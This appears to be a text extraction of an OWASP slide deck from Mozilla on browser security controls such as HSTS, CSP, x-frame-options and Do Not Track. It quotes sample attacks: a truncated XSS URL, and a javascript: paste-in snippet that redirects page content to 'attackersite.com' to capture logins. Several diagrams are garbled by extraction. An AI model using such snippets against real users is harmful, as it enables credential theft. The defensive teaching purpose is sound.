Enabling Browser Security in Web Applications
Topics:
Locking Down SSL/TLS
Stamping Out Cross Site Scripting
Socio-Technical Attacks
Privacy
Technologies Covered:
HTTP Strict Transport Security, Content Securit Policy, X-frame-options, Do Not Track
2. About
• Michael Coates
• Senior Manager, Mozilla
• Lead of Infrastructure Security Team
• mcoates@mozilla.com
• http://blog.mozilla.com/webappsec/
• http://michael-coates.blogspot.com
• @_mwc
OWASP 2
4. Fake certificate attack targets Facebook users in
Syria
May, 2011- theregister.co.uk
How to Hijack Facebook Using Firesheep
October, 2010 - pcworld.com
Locking Down SSL/TLS
Leaked Report: ISP Secretly Added Spy
Code To Web Sessions, Crashing Browsers
June, 2008 - wired.com
Internet traffic was routed via Chinese servers
U.S. military sites included
November, 2010 - washingtontimes.com
OWASP 4
5. Risks of Insecure Communication
High likelihood of attack
Open wifi, municipal wifi, malicious ISP
Easy to exploit
High impact to user
Clandestine monitoring of population
Injection of incorrect/malicious content
No protection from any defensive systems
Design flaw in application
OWASP 5
6. Insecure Session Management
Secure login over HTTPS Fir
esh
Att
Password submitted encrypted
ack eep
Immediate redirect to HTTP
Session ID sent cleartext <-- vulnerability point
!!"#
!"#$"%&'
!"%3*+%"' https://site.com/login
("&'("%%)*+,-.'//012'
!"#$"%&'
("%%)*+,-.'//012' http://site.com/profile
!"%3*+%"'
OWASP 6
8. Secure Design for Communication
HTTP Strict Transport Security (HSTS)
Opt-in security control
Website instructs compatible browser to enable STS for
site
HSTS Forces (for enabled site):
All communication over HTTPS
No insecure HTTP requests sent from browser
No option for user to override untrusted certificates
OWASP 8
9. Strict Transport Security
Browser prevents HTTP requests to HSTS site
Any request to site is “upgraded” to HTTPS
No clear text HTTP traffic ever sent to HSTS site
Browser assumes HTTPS for HSTS sites
!"#$$
'!(!#
$%%&%&&'()*+,-./'$ !"#$0##12%&&'()*+,-./'$
!!"#
344$5/6+7$
OWASP 9
11. HSTS FAQ
Is HSTS Cert Pinning?
No
Chicken and the Egg
Technically, but drastically less chance of attack
Certificate Rotation Problem?
No - HSTS forces valid certificate, doesn’t specify which
Browser Support
Current: Firefox & Chrome
https://www.owasp.org/index.php/
HTTP_Strict_Transport_Security#Browser_Support
OWASP 11
12. Protecting Outdated Users
HSTS supported in current browsers (Firefox,
Chrome)
Older browsers all support SECURE Cookie Flag
SECURE cookie flag
Instructs browser to only send cookie over HTTPS
Much less (and different) protection than HSTS, but
good defense in depth control
OWASP 12
13. Secure Flag
SECURE Flag doesn’t prevent HTTP requests like
HSTS
Just removes SECURE Cookies from HTTP request
!!"#
!"#$"%&'
!"%()*%"'
+"&'+"%%,)*-./'00123'
+"4$5"'
!!"#
!"#$"%&'
+"%%,)*-./'00123'
!"#$"%&'
666'
OWASP 13
14. Defensive Design
HTTP Strict Transport Security
http://tools.ietf.org/html/draft-hodges-strict-transport-sec
Set SECURE flag for cookies
Secure application design for TLS
https://www.owasp.org/index.php/
Transport_Layer_Protection_Cheat_Sheet
OWASP 14
16. Risks of XSS
Top Web Security Issue on OWASP Top 10 (2011,
2007, 2004)
Impact: Vulnerability allows attacker to change
any aspect of a vulnerable web page
Business Impact:
Compromise of user accounts
False data displayed on website
Remote monitoring of user actions with website
Full attacker control of content displayed and served
from website
OWASP 16
17. XSS Example
(1) Attacker submits malicious code
javascript
Name:_____
submit (3) Malicious site steals
passwords & installs malware
(2) Code is now part of webpage
Login: ___
<div class="featured">
<form action="/en-US/firefox/ Pass: ____
users/login" method="post"
id="login" class="featured-inner
object-lead">
submit to evil site
javascript
<div>
<input type="hidden"
<install malware>
name="data[Login][referer]"
(4) Attacker spreads malicious URL
http://site.com/?a=%3cscript%3edocument%2e OWASP 17
18. Frustrating Problem
XSS issues can occur anywhere user data is used in
a webpage
Difficult to identify all output locations
Many frameworks allow design patterns that lead
to XSS issues
OWASP 18
19. Content Security Policy (CSP)
CSP - New defensive control
to eliminate XSS
Name:_____
Allows web site to specify
where JavaScript can be submit
loaded from
Injected JavaScript via XSS is
CSP Policy
rendered inert
X-Content-
Violations & potential XSS Security-Policy:
attacks are reported to web allow 'self'; img-
site for investigation src 'self' data:
OWASP 19
20. XSS Example with CSP
(1) Attacker submits malicious code
javascript
Name:_____
submit
(2) CSP prevents script execution (3) Site safe to use
<div class="featured">
<form action="/en-US/firefox/
users/login" method="post"
id="login" class="featured-inner
object-lead"> Name:_____
javascript
<div>
<input type="hidden"
submit
name="data[Login][referer]"
value="/en-US/developers/addons"
id="LoginReferer" /><input
Violation report sent to
site.com/CSPalert OWASP 20
21. Implementing CSP
Some code changes needed to externalize
JavaScript
Run CSP in report only mode to test
Enable CSP and protect users with browsers
supporting CSP
Receive alerts on potential vulnerabilities in app
and quickly address to protect remaining users
OWASP 21
22. CSP Violation Reporting
Violations of CSP policy
reported to specified URL
Acts as XSS intrusion X-Content-Security-Policy:
allow self; report-uri http://
detection system reportcollector.example.com/
collector.cgi
CSP supported in portion
of site users, XSS IDS
benefits all
Reported data is from
client, trust accordingly
OWASP 22
25. Other CSP Benefits
Prevent ClickJacking via frame-ancestors
Control embeded frames via frame-src
Control domains for images via img-src
Control target domains via xhr-src
Enforce specific protocols (https://*.foo.com)
Future enhancement to control actions & malicious
forms
OWASP 25
26. Protecting Outdated Users
HTTPOnly mitigates one of XSS impacts - session
hijacking
Supported in all recent browsers
Easy, opt-in security control to protect users
Attacker’s Site
javascript
Cookie: SessionID
OWASP 26
27. Defensive Design
CSP gaining traction, potential to solve pressing
web security risk
HTTPOnly flag - easy setting to add additional layer
of defense
OWASP XSS Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_
%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
OWASP 27
29. ClickJacking
Attacker includes victim
page in iframe & overlays
opaque layer
Attacker’s image image
entices click and text Victim Site
interaction
Clicks are registered on
victim site underneath
Attacker’s Overlay
User inadvertently performs
action at victim site
OWASP 29
30. ClickJacking Example
Click the Bouncing Ball
Click to follow Joe
[ ] Grant Joe full
profile access
Confirm
OWASP 30
31. ClickJacking Defenses
x-frame-options header
Full solution
Compatible with new versions of browsers
Frame Busting Scripts
Partial solution
Compatible with older browsers
OWASP 31
32. x-frame-options
Additional header for HTTP/1.1 200 OK
HTTP Response Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Instructs browser to Content-Length: 35236
disallow framing x-frame-options: DENY
Two options - DENY, Text
SAMEORGIN
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;
Vary: Accept-Encoding
Content-Length: 35236
x-frame-options: SAMEORIGIN
OWASP 32
33. x-frame-options
Targeted site not
display if framed Victim Site
Attempted
Error page displayed ClickJack
Prevents ClickJacking
attack
Attacker’s Overlay
x-f-o Result
OWASP 33
34. Frame Busting Scripts
JavaScript within page to
detect framing
Will either “bust” the
frame or not display
content <script> if (document.top!= document.location){
document.top= document.location} </script>
Not optimal solution -
techniques available to
bypass defense
OWASP 34
35. URL Social Engineering
“Cool n
ew hid
den fe
ature”
”
our game
gems for y
“Get 10 free
Click the square and type the secret combination
ctrl+a, ctrl+c, ctrl+l, ctrl+v and enter
OWASP 35
36. Danger of those keystrokes...
click square - selected text
element
ctrl a - select all text
ctrl c - copy text javascript:....
ctrl l - select location bar
javascript:var
ctrl v - paste text xmlHttp;xmlHttp=new
XMLHttpRequest();xmlHttp.open("G
enter - execute JavaScript ET", document.location,
false);xmlHttp.send();xmlDoc=xmlHt
tp.responseText;var
str=xmlDoc;x.replace(/somesite
.com/, "attackersite.com");
document.writeln(x);
OWASP 36
37. URL JavaScript
Before
Pasted JavaScript
has full control of username:_____
page password:_____
submit
Can rewrite page
somesite.com
Extract and send any
data
After
No indication to user
username:_____ attackersite.com
password:_____
submit
OWASP 37
38. Defense
Code Change to Browser
Remove association between javascript: & loaded
document
Renders attack inert
OWASP 38
39. Your Android Phone is Tracking You
April, 2011 - pcworld.com
Your iPhone Is Tracking Your Every Move
April, 2011 - readwriteweb.com
Privacy
Mobile-App Makers Face U.S. Privacy Investigatio
April, 2011 - online.wsj.com
Nissan car secretly shares driver data with websites
June, 2011 - theregister.co.uk/
OWASP 39
40. Privacy
Business gains from gathering user data
Privacy infringement based on laws
Privacy concerns based on user expectations
Need better options for user to understand
collected data, control flow and accessibility of user
data
OWASP 40
41. Browser Profiling
Panopticlick
Fingerprints browser based
on provided information
Plugins installed
Font Support
Screen Resolution Your browser fingerprint appears to be
unique among the 1,636,839 tested so far.
Time Zone Currently, we estimate that your browser has
a fingerprint that conveys at least 20.64 bits
of identifying information.
OWASP 41
42. CSS History Sniffing
Determine user’s
browsing habits with CSS
Visited link different than Visited Link
non-visited link Unvisited Link
CSS and element
inspection determines
visited pages
if (getComputedStyle(link, "").color ==
"rgb(0, 0, 128)")
{
Issued fixed March 2010 // link.href has not been visited
} else {
// link.href has been visited
}
}
http://dbaron.org/mozilla/visited-privacy
OWASP 42
43. Evercookie
“Its [evercookie] goal is to • Standard HTTP Cookies
• Local Shared Objects (Flash Cookies)
identify a client even after they've
• Silverlight Isolated Storage
removed standard cookies, Flash
• Storing cookies in RGB values of auto-generated, force-cached
cookies (Local Shared Objects or • PNGs using HTML5 Canvas tag to read pixels (cookies) back out
LSOs), and others.” • Storing cookies in Web History
Multiple methods of storing & • Storing cookies in HTTP ETags
data on client • Storing cookies in Web cache
Could be abused for unauthorized • window.name caching
• Internet Explorer userData storage
tracking
• HTML5 Session Storage
Goal to keep user in control of • HTML5 Local Storage
data storage / tracking • HTML5 Global Storage
mechanisms • HTML5 Database Storage via SQLite
http://samy.pl/evercookie/
OWASP 43
44. Do Not Track
Adds header DNT: 1
to all web requests
Tells websites user
does not want
browsing activity to
be tracked
http://dnt.mozilla.org/
OWASP 44
45. Permission Manager
Granular management
options for user
interaction with sites
Control
Location Settings
Cookie Settings
Popup Windows
about:permissions
Offline Storage
OWASP 45
47. Closing
Defense In Depth
Many new security controls to enhance security
Strict Transport Security
Content Security Policy
x-frame-options
Do Not Track
OWASP 47
* request\nThe HTTP request line leading to the policy violation; this includes the method, resource path, and HTTP version.\n* request-headers\nThe HTTP headers that were sent resulting in a violation of the Content Security Policy.\n* blocked-uri\nThe URI of the resource that was blocked from loading by the Content Security Policy. This is not sent in the cast of frame-ancestors\nviolations; in that case, you should assume the blocked URI is the same as the request URI.\n* violated-directive\nThe name of the policy section that was violated.\n* original-policy The original policy as specified by the X-Content-Security-Policy HTTP header.\n